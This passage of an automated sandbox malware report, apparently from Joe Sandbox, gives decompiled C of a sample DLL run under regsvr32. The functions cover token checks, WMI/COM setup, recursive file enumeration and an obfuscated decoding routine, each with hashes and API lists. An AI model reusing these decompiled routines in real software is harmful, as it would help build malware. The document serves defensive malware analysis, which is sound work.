ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x2e5fc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x2e5fc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x2e5fc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000ba69
0x1000ba6b
0x1000ba72
0x1000ba74
0x1000ba77
0x1000ba7c
0x1000ba81
0x1000ba8b
0x1000ba8e
0x1000ba91
0x1000ba96
0x1000ba98
0x1000ba9e
0x1000bafe
0x1000bb06
0x1000bb0c
0x1000bb13
0x1000bb19
0x00000000
0x1000bb1a
0x1000baa3
0x1000baa4
0x1000baa5
0x1000baa6
0x1000baa7
0x1000baa8
0x1000baa9
0x1000baaa
0x1000baaf
0x1000bab1
0x1000bab6
0x1000bab7
0x1000bac1
0x00000000
0x00000000
0x1000bac5
0x1000baf1
0x1000baf1
0x1000baf9
0x1000bafc
0x00000000
0x1000bafc
0x1000bac7
0x1000bac7
0x1000baca
0x1000bacd
0x1000bacd
0x1000bad0
0x1000bad2
0x1000badc
0x00000000
0x00000000
0x1000bae1
0x1000bae2
0x1000bae5
0x1000baea
0x00000000
0x00000000
0x00000000
0x1000baec
0x1000baf0
0x00000000
0x1000baf0
0x1000bb1f

APIs

Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980

Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
String ID:
API String ID: 3752664914-0
Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d530
0x1000d533
0x1000d536
0x1000d547
0x1000d54d
0x1000d55e
0x1000d566
0x1000d5b7
0x1000d5b7
0x1000d5bc
0x1000d5c1
0x1000d5c1
0x1000d5c4
0x1000d5c9
0x1000d5ce
0x1000d5ce
0x1000d5d1
0x1000d568
0x1000d569
0x1000d56f
0x1000d580
0x1000d585
0x00000000
0x1000d587
0x1000d594
0x1000d59c
0x00000000
0x1000d59e
0x1000d5a0
0x1000d5a8
0x00000000
0x1000d5aa
0x1000d5ad
0x1000d5b3
0x1000d5b3
0x1000d5a8
0x1000d59c
0x1000d585
0x1000d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x2e5faa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x2e5fd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x2e5faa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}

0x1000aeb4
0x1000aec0
0x1000aec2
0x1000aec4
0x1000aeca
0x1000aecf
0x1000aed2
0x1000aed7
0x1000b011
0x1000b011
0x1000aeeb
0x1000aef0
0x1000b000
0x00000000
0x1000b00c
0x1000aef8
0x1000aef9
0x1000af00
0x1000af2f
0x1000af82
0x1000af82
0x1000af8a
0x1000af8b
0x1000af96
0x1000af98
0x1000af9b
0x1000afa0
0x1000afa2
0x1000afaa
0x1000afb0
0x1000afb2
0x1000afb4
0x1000afc9
0x1000afce
0x1000afd7
0x1000afdd
0x00000000
0x1000afa0
0x1000af31
0x1000af33
0x1000af33
0x1000af33
0x1000af3f
0x1000af40
0x1000af4a
0x00000000
0x00000000
0x1000af57
0x1000af5c
0x1000af61
0x00000000
0x00000000
0x1000af63
0x1000af6a
0x1000af70
0x1000af70
0x1000af73
0x1000af80
0x00000000
0x00000000
0x00000000
0x1000af80
0x1000afde
0x1000afe6
0x1000aff0
0x1000aff0
0x1000aff7
0x1000affd
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790

Uniqueness

Uniqueness Score: -1.00%

Function 00191C5D, Relevance: 1.7, Strings: 1, Instructions: 493
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00191C5D(signed int __ebx, signed int __ecx, signed int __edx, signed int __esi, signed int _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				signed int _t301;
				signed int _t303;
				signed char _t304;
				void* _t306;
				intOrPtr _t307;
				signed int _t311;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t336;
				signed int _t339;
				void* _t342;
				signed int _t345;
				signed int _t348;
				signed int _t352;
				signed int _t359;
				signed int _t360;
				signed int _t381;
				void* _t382;
				signed int _t383;
				signed char _t386;
				void* _t407;
				signed int _t410;
				signed int _t412;
				signed int _t426;
				signed int _t428;
				void* _t429;
				signed int _t450;
				signed int _t468;
				signed int* _t469;
				signed int* _t470;
				signed int* _t473;
				signed int* _t474;

				_t426 = __esi;
				_t381 = __edx;
				_t360 = __ecx;
				_t450 = _t468;
				_t469 = _t468 + 0xffffffe0;
				_push(__ebx);
				_v36 = __ebx;
				_t407 = _a8;
				_t336 = _v36;
				_push( *((intOrPtr*)(_t407 + 0xc)));
				_pop( *_t5);
				_push( *((intOrPtr*)(_t407 + 4)));
				_pop( *_t7);
				if(_v16 == 1) {
					_v24 = 7;
					_v8 = 1;
					_v12 = 8;
				}
				if(_v16 != 0) {
					if(_v16 != 2) {
						if(_v16 == 4) {
							if( *(_t336 + 0x4355dd) == 0) {
								_t301 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x435970)));
								_v36 = _t360;
								 *(_t336 + 0x4355dd) =  *(_t336 + 0x4355dd) & 0x00000000;
								 *(_t336 + 0x4355dd) =  *(_t336 + 0x4355dd) | _t360 - _v36 | _t301;
								_t360 = _v36;
							}
							if( *(_t336 + 0x435655) == 0) {
								_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
								_v36 = _t360;
								 *(_t336 + 0x435655) =  *(_t336 + 0x435655) & 0x00000000;
								 *(_t336 + 0x435655) =  *(_t336 + 0x435655) ^ _t360 & 0x00000000 ^ _t301;
								_t360 = _v36;
								if( *(_t336 + 0x435406) == 0) {
									_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0, 8);
									_v36 = _t426;
									 *(_t336 + 0x435406) = _t301;
									_t426 = _v36;
								}
							}
							_v24 = 1;
							if( *(_t336 + 0x4353f6) == 0) {
								_push( *((intOrPtr*)(_t336 + 0x43562d)));
								if( *(_t336 + 0x4351bb) == 0) {
									_t320 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x435619)));
									_v36 = _t426;
									 *(_t336 + 0x4351bb) =  *(_t336 + 0x4351bb) & 0x00000000;
									 *(_t336 + 0x4351bb) =  *(_t336 + 0x4351bb) ^ (_t426 ^ _v36 | _t320);
									_t426 = _v36;
								}
								_t301 =  *((intOrPtr*)(_t336 + 0x4410a4))();
								 *(_t336 + 0x4353f6) =  *(_t336 + 0x4353f6) & 0x00000000;
								 *(_t336 + 0x4353f6) =  *(_t336 + 0x4353f6) ^ _t450 ^  *_t469 ^ _t301;
								_t450 = _t450;
							}
							_v8 = 0x55;
							if( *(_t336 + 0x435392) == 0) {
								_t301 =  *((intOrPtr*)(_t336 + 0x441060))();
								 *(_t336 + 0x435392) =  *(_t336 + 0x435392) & 0x00000000;
								 *(_t336 + 0x435392) =  *(_t336 + 0x435392) | _t381 & 0x00000000 | _t301;
								_t381 = _t381;
							}
							if( *(_t336 + 0x435a35) == 0) {
								if( *(_t336 + 0x435258) == 0) {
									_t319 =  *((intOrPtr*)(_t336 + 0x441070))( *((intOrPtr*)(_t336 + 0x4352bb)));
									_v36 = _t426;
									 *(_t336 + 0x435258) =  *(_t336 + 0x435258) & 0x00000000;
									 *(_t336 + 0x435258) =  *(_t336 + 0x435258) | _t426 - _v36 | _t319;
									_t426 = _v36;
								}
								_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
								if( *(_t336 + 0x4358ac) == 0) {
									_t317 =  *((intOrPtr*)(_t336 + 0x441058))(_t301);
									_v36 = _t426;
									 *(_t336 + 0x4358ac) =  *(_t336 + 0x4358ac) & 0x00000000;
									 *(_t336 + 0x4358ac) =  *(_t336 + 0x4358ac) | _t426 - _v36 | _t317;
									_t426 = _v36;
									_t301 =  *_t469;
									_t469 =  &(_t469[1]);
								}
								 *(_t336 + 0x435a35) =  *(_t336 + 0x435a35) & 0x00000000;
								 *(_t336 + 0x435a35) =  *(_t336 + 0x435a35) | _t381 -  *_t469 ^ _t301;
								_t381 = _t381;
								if( *(_t336 + 0x435928) == 0) {
									_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0, 9);
									 *(_t336 + 0x435928) =  *(_t336 + 0x435928) & 0x00000000;
									 *(_t336 + 0x435928) =  *(_t336 + 0x435928) | _t407 -  *_t469 ^ _t301;
									_t407 = _t407;
								}
							}
							_v12 = 2;
							if( *(_t336 + 0x4357be) == 0) {
								_t301 =  *((intOrPtr*)(_t336 + 0x44105c))();
								_v36 = _t426;
								 *(_t336 + 0x4357be) =  *(_t336 + 0x4357be) & 0x00000000;
								 *(_t336 + 0x4357be) =  *(_t336 + 0x4357be) ^ (_t426 & 0x00000000 | _t301);
								_t426 = _v36;
							}
						}
					} else {
						if( *(_t336 + 0x435356) == 0) {
							_t301 =  *((intOrPtr*)(_t336 + 0x4410a8))(0,  *((intOrPtr*)(_t336 + 0x435910)));
							_v32 = _t381;
							 *(_t336 + 0x435356) = 0 ^ _t301;
							_t381 = _v32;
						}
						_v24 = 3;
						if( *(_t336 + 0x43530f) == 0) {
							_t301 =  *((intOrPtr*)(_t336 + 0x441060))();
							_v36 = _t426;
							 *(_t336 + 0x43530f) =  *(_t336 + 0x43530f) & 0x00000000;
							 *(_t336 + 0x43530f) =  *(_t336 + 0x43530f) | _t426 & 0x00000000 | _t301;
							_t426 = _v36;
						}
						if( *(_t336 + 0x4352d3) == 0) {
							_t63 = _t336 + 0x4353aa; // 0x86a99e
							_t325 = _t63;
							if( *(_t336 + 0x43580a) == 0) {
								_t326 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x4356c9)), _t325);
								_v32 = _t426;
								 *(_t336 + 0x43580a) = 0 ^ _t326;
								_t426 = _v32;
								_t325 =  *_t469;
								_t469 = _t469 - 0xfffffffc;
							}
							_t301 =  *((intOrPtr*)(_t336 + 0x441064))(_t325);
							 *(_t336 + 0x4352d3) =  *(_t336 + 0x4352d3) & 0x00000000;
							 *(_t336 + 0x4352d3) =  *(_t336 + 0x4352d3) ^ (_t381 & 0x00000000 | _t301);
							_t381 = _t381;
						}
						_v8 = 0x11;
						if( *(_t336 + 0x4355ad) == 0) {
							_t77 = _t336 + 0x43589c; // 0x86ae90
							_t301 =  *((intOrPtr*)(_t336 + 0x441068))(_t77);
							 *(_t336 + 0x4355ad) =  *(_t336 + 0x4355ad) & 0x00000000;
							 *(_t336 + 0x4355ad) =  *(_t336 + 0x4355ad) | _t360 & 0x00000000 ^ _t301;
							_t360 = _t360;
						}
						if( *(_t336 + 0x43547e) == 0) {
							if( *(_t336 + 0x4358a8) == 0) {
								_t323 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x435038)));
								 *(_t336 + 0x4358a8) =  *(_t336 + 0x4358a8) & 0x00000000;
								 *(_t336 + 0x4358a8) =  *(_t336 + 0x4358a8) | _t381 & 0x00000000 ^ _t323;
								_t381 = _t381;
							}
							_t301 =  *((intOrPtr*)(_t336 + 0x4410a4))( *((intOrPtr*)(_t336 + 0x43574a)));
							 *_t469 = _t450;
							 *(_t336 + 0x43547e) = 0 ^ _t301;
							_t450 = 0;
						}
						_v12 = 4;
						if( *(_t336 + 0x4350cc) == 0) {
							_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
							 *(_t336 + 0x4350cc) =  *(_t336 + 0x4350cc) & 0x00000000;
							 *(_t336 + 0x4350cc) =  *(_t336 + 0x4350cc) ^ _t450 & 0x00000000 ^ _t301;
							_t450 = _t450;
						}
						if( *(_t336 + 0x4350a8) == 0) {
							_t301 =  *((intOrPtr*)(_t336 + 0x441058))();
							if( *(_t336 + 0x435313) == 0) {
								_t321 =  *((intOrPtr*)(_t336 + 0x441060))(_t301);
								_v32 = _t426;
								 *(_t336 + 0x435313) =  *(_t336 + 0x435313) & 0x00000000;
								 *(_t336 + 0x435313) =  *(_t336 + 0x435313) | _t426 & 0x00000000 ^ _t321;
								_t426 = _v32;
								_t301 =  *_t469;
								_t469 = _t469 - 0xfffffffc;
							}
							_v32 = _t407;
							 *(_t336 + 0x4350a8) = _t301;
							_t407 = _v32;
							if( *(_t336 + 0x435884) == 0) {
								_t301 =  *((intOrPtr*)(_t336 + 0x4410a0))( *((intOrPtr*)(_t336 + 0x4355c1)),  *((intOrPtr*)(_t336 + 0x435595)),  *((intOrPtr*)(_t336 + 0x435416)),  *((intOrPtr*)(_t336 + 0x43503c)),  *((intOrPtr*)(_t336 + 0x435549)), 0x4b, 0x1000);
								_v32 = _t407;
								 *(_t336 + 0x435884) = _t301;
								_t407 = _v32;
							}
						}
					}
					 *_t469 =  *_t469 ^ _t381;
					_t382 = _t381;
					if( *(_t336 + 0x435a39) == 0) {
						_t301 =  *((intOrPtr*)(_t336 + 0x4410a0))( *((intOrPtr*)(_t336 + 0x435950)), 2,  *((intOrPtr*)(_t336 + 0x4357da)), 0x3d, 0x12e,  *((intOrPtr*)(_t336 + 0x435821)),  *((intOrPtr*)(_t336 + 0x43511a)), _t382);
						 *_t469 = _t450;
						 *(_t336 + 0x435a39) = 0 ^ _t301;
						_t450 = 0;
						_t469 = _t469 - 0xfffffffc;
					}
					_v36 = _t336;
					_t303 = _t301 & 0x00000000 | _t336 ^ _v36 ^ _v20;
					_t339 = _v36;
					_t304 = _t303 / _v12;
					_t383 = _t303 % _v12;
					if( *(_t339 + 0x435651) == 0) {
						_t311 =  *((intOrPtr*)(_t339 + 0x441044))(_t339 + 0x435544, _t339 + 0x435243, _t383);
						_v32 = _t360;
						 *(_t339 + 0x435167) =  *(_t339 + 0x435167) & 0x00000000;
						 *(_t339 + 0x435167) =  *(_t339 + 0x435167) ^ (_t360 - _v32 | _t311);
						_t360 = _v32;
						_t473 = _t469 - 0xfffffffc;
						_push( *((intOrPtr*)(_t339 + 0x441044))(_t339 + 0x435352, _t339 + 0x435685,  *_t469));
						_pop( *_t244);
						_push(_v36);
						_pop( *_t246);
						_push(0);
						if( *(_t339 + 0x4351fb) == 0) {
							_t316 =  *((intOrPtr*)(_t339 + 0x441064))(_t339 + 0x43568a);
							_v36 = _t426;
							 *(_t339 + 0x4351fb) =  *(_t339 + 0x4351fb) & 0x00000000;
							 *(_t339 + 0x4351fb) =  *(_t339 + 0x4351fb) ^ (_t426 & 0x00000000 | _t316);
							_t426 = _v36;
						}
						_t304 =  *((intOrPtr*)(_t339 + 0x441070))();
						 *(_t339 + 0x435651) =  *(_t339 + 0x435651) & 0x00000000;
						 *(_t339 + 0x435651) =  *(_t339 + 0x435651) | _t450 & 0x00000000 | _t304;
						_t450 = _t450;
						_t383 = 0 ^  *_t473;
						_t469 =  &(_t473[1]);
					}
					_v20 = _v20 - _t383;
					_t342 = _t339;
					_v32 = _t407;
					_v28 = _v28 & 0x00000000;
					_v28 = _v28 | _t407 - _v32 ^ _t383;
					_t410 = _v32;
					if( *(_t342 + 0x4355a9) == 0) {
						_t304 =  *((intOrPtr*)(_t342 + 0x441060))();
						_v32 = _t360;
						 *(_t342 + 0x4355a9) = 0 ^ _t304;
					}
					_t428 = _t426 & 0x00000000 | _t342 -  *_t469 | _a4;
					_t345 = _t342;
					_t412 = _t410 & 0x00000000 ^ (_t383 -  *_t469 | _t428);
					_t386 = _t383;
					if( *(_t345 + 0x435492) == 0) {
						_t304 =  *((intOrPtr*)(_t345 + 0x441054))(_t345 + 0x435482);
						_v36 = _t412;
						 *(_t345 + 0x435492) = 0 ^ _t304;
						_t412 = _v36;
					}
					_t429 = _t428 - 1;
					_push(_t345);
					do {
						 *_t469 = _t345;
						_t348 = 0;
						if(((0 ^ _t412) & _v24) == 0) {
							_t429 = _t429 + 1;
							_v36 = _t348;
							_t304 = _t304 & 0x00000000 | _t348 & 0x00000000 | _v12;
							_t348 =  *(_t304 + _t429) & 0x000000ff;
						}
						_v32 = _t348;
						_t345 = _v32;
						asm("rol edx, cl");
						_t386 = (_t386 & 0x00000000 ^ _t348 - _v32 ^ _v8) & _t345;
						asm("lodsb");
						_t304 = _t304 | _t386;
						 *_t412 = _t304;
						_t412 = _t412 + 1;
						_t291 =  &_v20;
						 *_t291 = _v20 - 1;
					} while ( *_t291 != 0);
					_t352 =  *_t469;
					_t470 = _t469 - 0xfffffffc;
					if( *((intOrPtr*)(_t352 + 0x435254)) == 0) {
						_t307 =  *((intOrPtr*)(_t352 + 0x44105c))();
						 *_t470 = _t450;
						 *((intOrPtr*)(_t352 + 0x435254)) = _t307;
						_t450 = 0;
					}
					_v32 = _t412;
					_t306 = memcpy(_v32, _t429 + 1, 0 ^ _v28);
					_pop( *_t299);
					return _t306;
				} else {
					_t359 =  *_t469;
					_t474 =  &(_t469[1]);
					_t330 =  *((intOrPtr*)(_t359 + 0x441044))(_t359 + 0x4359b8, _t359 + 0x43528c);
